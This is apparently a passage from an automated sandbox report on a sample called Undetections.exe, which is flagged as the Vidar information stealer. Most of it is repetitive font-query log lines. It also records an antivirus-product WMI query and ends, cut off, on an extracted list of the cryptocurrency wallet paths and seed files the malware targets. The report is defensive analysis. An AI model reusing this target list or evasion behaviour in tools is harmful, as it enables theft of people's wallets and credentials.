                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeQueries volume information: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410180 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,4_2_00410180
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410100 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_00410100
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004101E0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_004101E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD8390 NSS_GetVersion,4_2_69CD8390
                          Source: C:\Users\user\Desktop\Undetections.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: 2.2.spoofer.exe.4175570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.spoofer.exe.4175570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: spoofer.exe PID: 7592, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local 